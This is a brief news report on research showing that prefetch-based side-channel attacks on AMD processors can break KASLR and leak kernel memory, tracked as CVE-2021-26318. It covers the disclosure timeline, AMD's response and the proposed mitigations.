Researchers from University of Technology and CISPA Helmholtz Center for Information Security, discovered the new attack method on AMD CPU which affects all the version. These side-channel attacks typically allow a malicious application installed on the targeted system to exploit CPU flaws in order to obtain potentially sensitive information from memory associated with other apps, such as passwords and encryption keys.
The newly presented research demonstrates that, Many of the side-channel attacks revealed in recent years have targeted Intel processors, but systems powered by AMD processors are not immune.
According to the announcement made by the experts,”We observe timing and power variations of the prefetch instruction from unprivileged user space.” In contrast to previous work on Intel prefetch attacks, we demonstrate that the AMD prefetch instruction leaks even more information.”
On June 16th, 2020, the researchers reported their findings to AMD, and the remaining parts on November 24th, 2020. On February 16th, 2021, AMD acknowledged the findings and provided feedback.
The researchers demonstrated several attack cases such as one in which , microarchitectural break of the exploit mitigation technique KASLR on AMD CPUs. They were able to establish a covert channel by monitoring kernel activity (for example, if audio is played over Bluetooth). The team also demonstrated how to use simple Spectre gadgets in the Linux kernel to exfiltrate data from kernel memory.
The research paper also includes countermeasures and mitigation strategies for the presented attacks such as:
- Page Table Isolation
- Prefetch Configuration MSRs
- Restricting Access.
The flaws were collectively tracked as CVE-2021-26318, with AMD classifying them as medium severity All of its CHIPS are affected by flaws. However, the chipmaker does not recommend any mitigations because the researchers’ attack scenarios do not directly leak data across address space boundaries.